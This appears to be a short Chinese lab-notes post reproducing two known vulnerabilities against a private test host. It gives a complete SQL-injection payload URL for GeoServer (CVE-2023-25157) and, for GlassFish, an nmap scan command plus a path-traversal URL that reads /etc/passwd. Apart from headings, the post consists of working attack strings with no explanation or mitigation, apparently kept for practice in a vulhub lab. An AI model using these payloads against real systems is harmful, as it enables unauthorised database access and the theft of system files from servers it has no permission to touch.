Close

7 6 月, 2024

(CVE-2023-25157)(GlassFish 文件读取)

GeoServer OGC Filter SQL注入漏洞(CVE-2023-25157)

payload:http://192.168.85.130:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith(name%2C%27x%27%27)+%3D+true+and+1%3D(SELECT+CAST+((SELECT+version())+AS+integer))+–+%27)+%3D+true

GlassFish 任意文件读取漏洞

信息收集:nmap 192.168.85.130 -A -sV 

Payload:https://192.168.85.130:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd